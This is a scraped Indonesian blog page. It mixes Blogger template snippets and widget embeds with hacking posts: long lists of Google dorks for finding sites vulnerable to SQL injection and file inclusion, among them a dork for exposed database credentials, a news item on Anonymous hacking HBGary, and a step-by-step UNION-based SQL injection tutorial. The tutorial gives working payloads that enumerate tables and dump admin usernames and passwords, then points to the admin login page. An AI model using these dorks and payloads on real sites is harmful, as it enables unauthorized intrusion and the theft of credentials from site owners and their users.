window.moveTo(0,scrH/1)

window.resizeTo(scrW*b/100,0)

}

for(c=0;c<100;c++){

window.moveTo(scrW/1,scrH/1)

window.resizeTo(0,scrH*c/100)

}

for(d=0;d<100;d++){

window.moveTo(scrW/1,0)

window.resizeTo(scrW*d/100,0)

}

for(e=0;e<100;e++){

window.resizeTo(scrW*e/100,scrH*e/100)

}

window.moveTo(0,0)

window.resizeTo(scrW,scrH)

//]]>

</script>

9 redmore:

9.a

]]></b:skin>

<style>

<b:if cond='data:blog.pageType == &quot;item&quot;'>

  span.fullpost {display:inline;}

<b:else/>

  span.fullpost {display:none;}

</b:if>

</style>

9.b

<span class="fullpost">

</span>

10. aktif2:

<script src="http://h2.flashvortex.com/display.php?id=2_1296027210_59495_330_0_468_60_9_2_38" type="text/javascript"></script>

 

11.aktif3=<script src="http://h2.flashvortex.com/display.php?id=2_1296027900_17602_330_0_468_60_9_2_38" type="text/javascript"></script>

12.marquee:

<marquee align="center" behavior="alternate" direction="up" height="300" onmouseout="this.start()" onmouseover="this.stop()" scrollamount="2" width="100">

Teks 1

Teks 2

Teks 3

</marquee>

13. tulisan aneh:

<a href="http://www.glitter-graphics.com/myspace/text_generator.php"

target=_blank><img src="http://text.glitter-graphics.net/crl/a.gif"

border=0><img src="http://text.glitter-graphics.net/crl/n.gif" border=0>

<img src="http://text.glitter-graphics.net/crl/n.gif" border=0>

<img src="http://text.glitter-graphics.net/crl/i.gif" border=0>

<img src="http://text.glitter-graphics.net/crl/v.gif" border=0>

<img src="http://text.glitter-graphics.net/crl/e.gif" border=0>

<img src="http://text.glitter-graphics.net/crl/r.gif" border=0>

<img src="http://text.glitter-graphics.net/crl/s.gif" border=0>

<img src="http://text.glitter-graphics.net/crl/a.gif" border=0>

<img src="http://text.glitter-graphics.net/crl/r.gif" border=0>

<img src="http://text.glitter-graphics.net/crl/r.gif" border=0>

<img src="http://text.glitter-graphics.net/crl/y.gif" border=0></a>

14. tulisan aneh:

<a href="http://www.glitter-graphics.com/myspace/text_generator.php"

target=_blank><img src="http://text.glitter-graphics.net/gold/a.gif" border=0>

<img src="http://text.glitter-graphics.net/gold/n.gif" border=0>

<img src="http://text.glitter-graphics.net/gold/n.gif" border=0>

<img src="http://text.glitter-graphics.net/gold/i.gif" border=0>

<img src="http://text.glitter-graphics.net/gold/v.gif" border=0>

<img src="http://text.glitter-graphics.net/gold/e.gif" border=0>

<img src="http://text.glitter-graphics.net/gold/r.gif" border=0>

<img src="http://text.glitter-graphics.net/gold/s.gif" border=0>

<img src="http://text.glitter-graphics.net/gold/a.gif"

src="http://text.glitter-graphics.net/gold/r.gif" border=0><img src="http://text.glitter-graphics.net/gold/r.gif" border=0>

<img src="http://text.glitter-graphics.net/gold/y.gif" border=0></a>

 

15.ip=<a href="http://www.123myip.co.uk/cometo/?en">

<img src="http://www.123myip.co.uk/ip-address/?size=125x125" border="0" width="125" height="125" alt="IP" /></a>

16. hujan daun dibawah</head>:

<script src='http://arti.master.irhamna.googlepages.com/daun.js'/>

17. kucing gila:

<a href="http://www.glitter-graphics.com"><img src="http://dl9.glitter-graphics.net/pub/660/660759jzef7rhw6w.gif" width=128 height=128 border=0></a>

18. wiget:

<script src="http://cdn.wibiya.com/Toolbars/dir_0688/Toolbar_688423/Loader_688423.js" type="text/javascript"></script><noscript><a href="http://www.wibiya.com/">Web Toolbar by Wibiya</a></noscript>

19. chat:

<!-- Begin ShoutMix - http://www.shoutmix.com -->

<iframe title="kasan_esan" src="http://www.shoutmix.com/?kasan_esan" width="100%" height="460" frameborder="0" scrolling="auto"><a href="http://www.shoutmix.com/?kasan_esan">View shoutbox</a>

</iframe><br /><a href="http://www.shoutmix.com" title="Get your own free shoutbox chat widget at ShoutMix!">ShoutMix chat widget</a><br /><!-- End ShoutMix -->

Sembunyi:

   <style type="text/css">

   #gb{

   position:fixed;

   top:50px;

   z-index:+1000;

   }

   * html #gb{position:relative;}

   .gbtab{

   height:100px;

   width:30px;

   float:left;

   cursor:pointer;

   background:url('https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg_aWaxpSYDjeQumn6q17JBl4Hnx_thaAek1Js0GO8I5MzcIadonUOn6Rt36QXBxIECY5Yq7XyOkkpqxeto3PSgOYuHloL0mkaPrKdvjIDL43K79Npx895bwCNfWnZVugNx4ol3cWK_V0BZ/') no-repeat;

   }

   .gbcontent{

   float:left;

   border:2px solid #A5BD51;

   background:#F5F5F5;

   padding:10px;

   }

   </style>

   <script type="text/javascript">

   function showHideGB(){

   var gb = document.getElementById("gb");

   var w = gb.offsetWidth;

   gb.opened ? moveGB(0, 30-w) : moveGB(20-w, 0);

   gb.opened = !gb.opened;

   }

   function moveGB(x0, xf){

   var gb = document.getElementById("gb");

   var dx = Math.abs(x0-xf) > 10 ? 5 : 1;

   var dir = xf>x0 ? 1 : -1;

   var x = x0 + dx * dir;

   gb.style.right = x.toString() + "px";

   if(x0!=xf){setTimeout("moveGB("+x+", "+xf+")", 10);}

   }

   </script>

   <div id="gb">

   <div class="gbtab" onclick="showHideGB()"> </div>

   <div class="gbcontent">

   <!-- Begin ShoutMix - http://www.shoutmix.com -->

<iframe title="kasan_esan" src="http://www.shoutmix.com/?kasan_esan" width="100%" height="460" frameborder="0" scrolling="auto"><a href="http://www.shoutmix.com/?kasan_esan">View shoutbox</a>

</iframe><br /><a href="http://www.shoutmix.com" title="Get your own free shoutbox chat widget at ShoutMix!">ShoutMix chat widget</a><br /><!-- End ShoutMix -->

   <br/>

   <br/>

   <a href="http://forantum.blogspot.com">.

   </a>

   <div style="text-align:right">

   <a href="javascript:showHideGB()">

   [close]

   </a>

   </div>

   </div>

   </div>

   <script type="text/javascript">

   var gb = document.getElementById("gb");

   gb.style.right = (30-gb.offsetWidth).toString() + "px";

   </script></div></div>

20. weather:

<table><tr><td><script src="http://www.bloguez.com/service/meteo/meteo.php?taille=195&adult=0&cat=internet&ville=Banjarmasin, Indonesia&code=IDXX0009"></script></td></tr><tr><td align="center">

<a href="http://www.bloguez.com"><img src="http://www.bloguez.com/service/logo.gif" border="0" alt="bloguez.com" /></a>

<noscript>Service offert par <a href="http://www.bloguez.com">bloguez.com</a></noscript></td></tr></table>

imutz

<a href="http://ilmucts.blogspot.com" target="_blank">

<img border="0" alt="ILmucts" src="http://a.imageshack.us/img820/5659/mag.gif" /></a>

Share

Membuat Redmore Otomatis di Blogger

1. Login ke Blog anda
2. Buka halaman design > Edit HTML > centang Expand template widget
3. Cari kode </head> gunakan CTRL + F untuk mempermudah pencarian
4. Paste kode berikut tepat dibawah </head>

<script type='text/javascript'> var thumbnail_mode = &quot;no-float&quot; ; summary_noimg = 430; summary_img = 340; img_thumb_height = 100; img_thumb_width = 120; </script> <script src='http://script-bamz-us.googlecode.com/files/read-moreotomatis.js' type='text/javascript'/>

Selanjutnya cari kode <data:post.body/> atau <p><data:post.body/></p>  ( seperti biasan gunakan CTRL + F untuk mempermudah pencarian. Jika ditemukan 2 kode yang sama, gunakan atau ganti yang pertama.
Jika sudah ketemu silahkan anda ganti kode tersebut dengan kode dibawah ini:

<b:if cond='data:blog.pageType != &quot;item&quot;'>
 <div expr:id='&quot;summary&quot; + data:post.id'><data:post.body/></div>
 <script type='text/javascript'>createSummaryAndThumb(&quot;summary<data:post.id/>&quot;);
 </script>
 <span class='rmlink' style='float:right;padding-top:20px;'>
 <a expr:href='data:post.url'><img src="http://lh3.ggpht.com/_kTaFrEr_318/SkKGIoU-oPI/AAAAAAAAA9g/5A_nTHvFgiI/readmore_thumb%5B2%5D.gif"></img></a></span>
 </b:if>
 <b:if cond='data:blog.pageType == &quot;item&quot;'><data:post.body/></b:if>

Share

Google Dork Part III

general.php?include=
start.php?addr=
index1.php?qry=
index1.php?loc=
page.php?addr=
index1.php?dir=
principal.php?pr=
press.php?seite=
head.php?cmd=
home.php?sec=
home.php?category=
standard.php?cmd=
mod*.php?thispage=
base.php?to=
view.php?choix=
base.php?panel=
template.php?mod=
info.php?j=
blank.php?pref=
sub*.php?channel=
standard.php?in=
general.php?cmd=
pagina.php?panel=
template.php?where=
path.php?channel=
gery.php?seccion=
page.php?tipo=
sitio.php?rub=
pagina.php?u=
file.php?ir=
*inc*.php?sivu=
path.php?start=
page.php?chapter=
home.php?recipe=
enter.php?pname=
layout.php?path=
print.php?open=
mod*.php?channel=
down*.php?phpbb_root_path=
*inc*.php?str=
gery.php?phpbb_root_path=
include.php?middlePart=
sub*.php?destino=
info.php?read=
home.php?sp=
main.php?strona=
sitio.php?get=
sitio.php?index=
index3.php?option=
enter.php?a=
main.php?second=
print.php?pname=
blank.php?itemnav=
blank.php?pagina=
index1.php?d=
down*.php?where=
*inc*.php?include=
path.php?pre=
home.php?loader=
start.php?eval=
index.php?disp=
head.php?mod=
sitio.php?section=
nota.php?doshow=
home.php?seite=
home.php?a=
page.php?url=
pagina.php?left=
layout.php?c=
principal.php?goto=
standard.php?base_dir=
home.php?where=
page.php?sivu=
*inc*.php?adresa=
padrao.php?str=
include.php?my=
show.php?home=
index.php?load=
index3.php?rub=
sub*.php?str=
start.php?index=
nota.php?mod=
sub*.php?mid=
index1.php?*[*]*=
pagina.php?oldal=
padrao.php?loc=
padrao.php?rub=
page.php?incl=
gery.php?disp=
nota.php?oldal=
include.php?u=
principal.php?pagina=
print.php?choix=
head.php?filepath=
include.php?corpo=
sub*.php?action=
head.php?pname=
press.php?dir=
show.php?xlink=
file.php?left=
nota.php?destino=
general.php?module=
index3.php?redirect=
down*.php?param=
default.php?ki=
padrao.php?h=
padrao.php?read=
mod*.php?cont=
index1.php?l=
down*.php?pr=
gery.php?viewpage=
template.php?load=
nota.php?pr=
padrao.php?destino=
index2.php?channel=
principal.php?opcion=
start.php?str=
press.php?*[*]*=
index.php?ev=
pagina.php?pre=
nota.php?content=
include.php?adresa=
sitio.php?t=

Share

Google Dork Part II

shredder-categories.php?id=
tradeCategory.php?id=
product_ranges_view.php?ID=
shop_category.php?id=
transcript.php?id=
channel_id=
item_id=
newsid=
trainers.php?id=
news-full.php?id=
news_display.php?getid=
index2.php?option=
readnews.php?id=
newsone.php?id=
product-item.php?id=
pages.php?id=
clanek.php4?id=
viewapp.php?id=
viewphoto.php?id=
galeri_info.php?l=
iniziativa.php?in=
curriculum.php?id=
labels.php?id=
story.php?id=
look.php?ID=
aboutbook.php?id=
"id=" & intext:"Warning: mysql_fetch_assoc()
"id=" & intext:"Warning: is_writable()
"id=" & intext:"Warning: Unknown()
"id=" & intext:"Warning: mysql_result()
"id=" & intext:"Warning: pg_exec()
"id=" & intext:"Warning: require()
buy.php?category=
pageid=
page.php?file=
show.php?id=
newsitem.php?num=
readnews.php?id=
top10.php?cat=
reagir.php?num=
Stray-Questions-View.php?num=
forum_bds.php?num=
game.php?id=
view_product.php?id=
sw_comment.php?id=
news.php?id=
avd_start.php?avd=
event.php?id=
sql.php?id=
select_biblio.php?id=
ogl_inet.php?ogl_id=
fiche_spectacle.php?id=
kategorie.php4?id=
faq2.php?id=
show_an.php?id=
loadpsb.php?id=
announce.php?id=
participant.php?id=
download.php?id=
article.php?id=
person.php?id=
productinfo.php?id=
showimg.php?id=
rub.php?idr=
view_faq.php?id=
artikelinfo.php?id=
index.php?=
profile_view.php?id=
category.php?id=
fellows.php?id=
downloads_info.php?id=
prod_info.php?id=
shop.php?do=part&id=
collectionitem.php?id=
band_info.php?id=
product.php?id=
viewshowdetail.php?id=
clubpage.php?id=
memberInfo.php?id=
tradeCategory.php?id=
transcript.php?id=
item_id=
news-full.php?id=
aboutbook.php?id=
preview.php?id=
material.php?id=
read.php?id=
viewapp.php?id=
story.php?id=
newsone.php?id=
rubp.php?idr=
art.php?idm=
title.php?id=
index1.php?modo=
include.php?*[*]*=
nota.php?pollname=
index3.php?p=
padrao.php?pre=
home.php?pa=
main.php?type=
sitio.php?start=
*.php?include=
general.php?xlink=
show.php?go=
nota.php?ki=
down*.php?oldal=
layout.php?disp=
enter.php?chapter=
base.php?incl=
enter.php?mod=
show.php?corpo=
head.php?*[*]*=
info.php?strona=
template.php?str=
main.php?doshow=
view.php?*[*]*=
index.php?to=
page.php?cmd=
view.php?b=
info.php?option=
show.php?x=
template.php?texto=
index3.php?ir=
print.php?chapter=
file.php?inc=
file.php?cont=
view.php?cmd=
include.php?chapter=
path.php?my=
principal.php?param=
general.php?menue=
index1.php?b=
info.php?chapter=
nota.php?chapter=

Share

Siapa Anonymous

Anonymous adalah kelompok hacktivist (aktivis hacker) yang selama ini getol membela WikiLeaks serta para aktivis oposisi di Mesir dan Tunisia.

Kepada Financial Times bahkan Aaron Barr, Head of Security Services Firm, HBGary, menyebutkan beberapa nama yang ia klaim sebagai tokoh-tokoh senior di Anonymous, seperti orang bernama Q,, Owen, dan beberapa orang lain di Inggris, Jerman, Belanda, Italia, dan Australia.

Berang dengan tindak-tanduk Barr, kelompok Anonymous kemudian melakukan aksi balas denda, Anonymous berhasil mengambil alih situs resmi HGBarry yang hingga kini tak bisa diakses.

Di situs tersebut, Anonymous bahkan sempat memajang pengumuman mengapa mereka melakukan aksi tersebut. Biarkan kami memberikan pelajaran yang tidak terlupakan: Anda jangan macam-macam dengan Anonymous. Terutama bila Anda cuma ingin menarik perhatian publik, kata Anonymous.

Selanjutnya, Anonymous mengungkap salah satu isi email pribadi Barr yang intinya memang ia menginginkan publikasi dengan cara mengungkap jati diri Anonymous. Ini bukan tentang mereka, ini tentang audiens yang akan mendapatkan kesan baik tentang kemampuan dan kompetensi riset yang kita miliki, kata Barr dalam email pribadinya.

Tak hanya itu, sejak kemarin Anonymous juga berhasil menguasai akun Twitter Aaron Barr dan memposting berbagai tweet mengejek Barr termasuk dengan kata-kata yang kurang senonoh.

Hacker juga mengungkap alamat detil, nomor jaminan sosial milik Barr serta lebih dari 50 ribu email dari akun pribadi Barr. Anonymous juga mengklaim memiliki detail kondisi finansial perusahaan dan mengancam untuk menghapus konten yang ada di server HBGary Federal.

HBGary awalnya adalah forum keamanan yang didirikan oleh pakar keamanan komputer Greg Hoglund. Belakangan didirikan sebuah perusahaan keamanan bernama HBGary Federal, dan Greg memiliki 15 persen saham pada perusahaan tersebut.

Beberapa waktu belakangan para pendukung hacker Anonymous dikejar-kejar oleh pihak keamanan di berbagai negara terkait dengan serangan mereka ke beberapa situs yang dianggap memusuhi WikiLeaks, seperti paypai, MasterCard, atau VISA.

Bulan lalu FBI, mengeluarkan perintah pencarian terhadap lebih dari 40 orang pendukung hacker Anonymous. Polisi Inggris juga telah mencokok lima orang yang dituduh mendukung aksi Anonymous. Sementara, Hoglund dan Barr, kabarnya bernegosiasi dengan hacker Anonymous unttuk mendapatkan kembali data perusahaan mereka.

Sumber : Berita-terbaru.com

Share

Google Dork Part I

Pasotingan kali ini, ane akan berbagi dork2 google yang ane dapet dari beberapa sumber, bagi yang belum tau apa itu google dork dan bagaimana cara menggunakannya bisa klik di sini

============

inurl : ....................

============

trainers.php?id=

article.php?ID=

play_old.php?id=

declaration_more.php?decl_id=

Pageid=

games.php?id=

newsDetail.php?id=

staff_id=

historialeer.php?num=

product-item.php?id=

news_view.php?id=

humor.php?id=

communique_detail.php?id=

sem.php3?id=

opinions.php?id=

spr.php?id=

pages.php?id=

chappies.php?id=

prod_detail.php?id=

viewphoto.php?id=

view.php?id=

website.php?id=

hosting_info.php?id=

gery.php?id=

detail.php?ID=

publications.php?id=

Productinfo.php?id=

releases.php?id=

ray.php?id=

produit.php?id=

pop.php?id=

shopping.php?id=

productdetail.php?id=

post.php?id=

section.php?id=

theme.php?id=

page.php?id=

shredder-categories.php?id=

product_ranges_view.php?ID=

shop_category.php?id=

channel_id=

newsid=

news_display.php?getid=

ages.php?id=

clanek.php4?id=

review.php?id=

iniziativa.php?in=

curriculum.php?id=

labels.php?id=

look.php?ID=

galeri_info.php?l=

tekst.php?idt=

newscat.php?id=

newsticker_info.php?idn=

rubrika.php?idr=

offer.php?idf=

"id=" & intext:"Warning: mysql_fetch_array()

"id=" & intext:"Warning: getimagesize()

"id=" & intext:"Warning: session_start()

"id=" & intext:"Warning: mysql_num_rows()

"id=" & intext:"Warning: mysql_query()

"id=" & intext:"Warning: array_merge()

"id=" & intext:"Warning: preg_match()

"id=" & intext:"Warning: ilesize()

"id=" & intext:"Warning: filesize()

index.php?id=

buy.php?category=

article.php?ID=

play_old.php?id=

newsitem.php?num=

top10.php?cat=

historialeer.php?num=

reagir.php?num=

Stray-Questions-View.php?num=

forum_bds.php?num=

game.php?id=

view_product.php?id=

sw_comment.php?id=

news.php?id=

avd_start.php?avd=

event.php?id=

sql.php?id=

news_view.php?id=

select_biblio.php?id=

humor.php?id=

ogl_inet.php?ogl_id=

fiche_spectacle.php?id=

communique_detail.php?id=

sem.php3?id=

kategorie.php4?id=

faq2.php?id=

show_an.php?id=

preview.php?id=

loadpsb.php?id=

opinions.php?id=

spr.php?id=

announce.php?id=

participant.php?id=

download.php?id=

main.php?id=

review.php?id=

chappies.php?id=

read.php?id=

prod_detail.php?id=

article.php?id=

person.php?id=

productinfo.php?id=

showimg.php?id=

view.php?id=

website.php?id=

hosting_info.php?id=

gery.php?id=

rub.php?idr=

view_faq.php?id=

artikelinfo.php?id=

detail.php?ID=

index.php?=

profile_view.php?id=

category.php?id=

publications.php?id=

fellows.php?id=

downloads_info.php?id=

prod_info.php?id=

shop.php?do=part&id=

collectionitem.php?id=

band_info.php?id=

product.php?id=

releases.php?id=

ray.php?id=

produit.php?id=

pop.php?id=

shopping.php?id=

productdetail.php?id=

post.php?id=

viewshowdetail.php?id=

clubpage.php?id=

memberInfo.php?id=

section.php?id=

theme.php?id=

page.php?id=

Share

Google Dork

Berhubung banyak yang belum tahu tentang defenisi dan fungsi dari google dork maka berikut ini akan saya jelaskan seperti apa google dork itu.




Google dork adalah kata kunci dalam mempermudah pencarian data pada google, dimana kata kunci inilah yang membantu banyak sekali Hacker/cracker/security dalam mencari data yang akurat maupun data data yang tersembunyi seperti log, username maupun password. selain itu google dork adalah kata kunci yang digunakan untuk melakukan pencarian akurat terhadapap informasi yang akan di cari. misalkan untuk mencari software, file pdf, dll.  


berikut ini adalah contohnya :


"site:"
Google akan membatasi pencarian dan hasilnya berdasarkan site/web yang dituju
contoh : site:google.com facebook, maka akan mencari semua facebook di situs google.com


"allintitle:"
Google melakukan pencarian pada semua Judul
contoh : allintitle:face book, maka akan mencari semua judul face dan semua judul book


"intitle:"
Google melakukan pencarian pada semua Judul lebih spesifik
contoh : intitle:face book, maka akan mencari semua judul face yang ada book nya


"allinurl:"
google akan melakukan pencarian pada URL yang di cari
contoh : allinurl:face book, maka akan mencari semua url face dan semua url book


"inurl:"
Google akan melakukan pencarian Pada URL lebih spesifik
contoh : inurl:face book , maka akan mencari site face yang ada url book nya


site:*.com inurl:config.php dbuname dbpass (admin)






Sumber : "google.com"

Share

SQL Injection | Alice norin

Pagi yang cerah ini, ane akan bagi tutor dari sohib ane " Alice Norin " , kebetulan, ane belajar Sql injection juga pke tutor ini, semoga bermanfaat kk'

Pengertian sql injection:
SQL injection adalah sebuah aksi hacking yang dilakukan di aplikasi client dengan cara memodifikasi perintah SQL yang ada di memori aplikasi clien dan juga merupakan teknik mengeksploitasi web aplikasi yang didalamnya menggunakan database untuk penyimpanan data.


Yang perlu di ketahui sebelum sql injection pada mysql:
karakter: ' atau -
comments: /* atau --

information_schema untuk versi: mysql versi 5.x , tidak support untuk mysql versi 4.x

===========
[+]step Satu:=
===========

carilah target
misal: [site]/berita.php?id=100

Tambahkan karakter ' pada akhir url atau menambahkan karakter "-" untuk melihat apakah ada pesan error.
contoh: [site]/berita.php?id=100' atau
[site]/berita.php?id=-100

sehingga muncul pesan error seperti berikut (masih bnyak lagi):


==========
[+]step Dua:=
==========

mencari dan menghitung jumlah table yang ada dalam databasenya...
gunakan perintah : order by

contoh: [site]/berita.php?id=-100+order+by+1-- atau
[site]/berita.php?id=-100+order+by+1/*

ceklah secara step by step (satupersatu)...
misal: [site]/berita.php?id=-100+order+by+1--
[site]/berita.php?id=-100+order+by+2--
[site]/berita.php?id=-100+order+by+3--
[site]/berita.php?id=-100+order+by+4--

sehingga muncul error atau hilang pesan error...
misal: [site]/berita.php?id=-100+order+by+9--

berarti yang kita ambil adalah sampai angka 8
menjadi [site]/berita.php?id=-100+order+by+8--


===========
[+]step Tiga:=
===========

untuk mengeluarkan angka berapa yang muncul gunakan perintah union
karena tadi error sampai angka 9
maka: [site]/berita.php?id=-100+union+select+1,2,3,4,5,6,7,8--

ok seumpama yg keluar angka 5

gunakan perintah version() atau @@version untuk mengecek
versi sql yg diapakai masukan perintah tsb pada nagka yg keluar tadi
misal: [site]/berita.php?id=-100+union+select+1,2,3,4,version(),6,7,8-- atau
[site]/berita.php?id=-100+union+select+1,2,3,4,@@version,6,7,8--

lihat versi yg digunakan seumpama versi 4 tinggalkan saja karena dalam ver 4 ini kita harus menebak sendiri table n column yg ada pada web tersebut karena tidak bisa menggunakan perintah From+Information_schema..

untuk versi 5 berarti anda beruntung tak perlu menebak table n column seperti ver 4 karena di ver 5 ini bisa menggunakan perintah From+Information_schema..


============
[+]step Empat:=
============

untuk menampilkan table yg ada pada web tsb adalah
perintah table_name >>> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.tables/* >>> dimasukan setelah angka terakhir

[site]/berita.php?id=-100+union+select+1,2,3,4,table_name,6,7,8+from+information_schema.tables--

seumpama table yang muncul adalah "admin"


===========
[+]step Lima:=
===========

untuk menampilkan semua isi dari table tsb adalah
perintah group_concat(table_name) >>> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.tables+where+table_schema=database() >>> dimasukan setelah angka terakhir

[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(table_name),6,7,8+from+information_schema.tables+where+table_schema=database()--


=============
[+] step Enam: =
=============

perintah group_concat(column_name) >>> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.columns+where+table_name=0xhexa-- >>> dimasukan setelah angka terakhir

[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(column_name),6,7,8+from+information_schema.columns+where+table_name=0xhexa--

pada tahap ini kamu wajib mengextrak kata pada isi table menjadi hexadecimal yaitu dengan cara mengkonversinya
website yg digunakan untuk konversi :

http://home.paulschou.net/tools/xlate/

contoh kata yg ingin di konversi yaitu admin maka akan menjadi 61646D696E

[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(column_name),6,7,8+from+information_schema.columns+where+table_name=0x61646D696E--


============
=step Tujuh:=
============

memunculkan apa yg tadi telah dikeluarkan dari table yaitu dengan cara

perintah concat_ws(0x3a,hasil isi column yg mau dikeluarkan) >>> dimasukan pada angka yg keluar tadi
perintah +from+(nama table berasal) >>> dimasukan setelah angka terakhir

[site]/berita.php?id=-100+union+select+1,2,3,4,concat_ws(0x3a,hasil isi column),6,7,8+from+(nama table berasal)--


contoh kata yang keluar adalah id,username,password

[site]/berita.php?id=-100+union+select+1,2,3,4,concat_ws(0x3a,id,username,password),6,7,8+from+admin--


==============
[+] step Delapan:=
==============

tahap terakhir mencari halam admin atau login

Share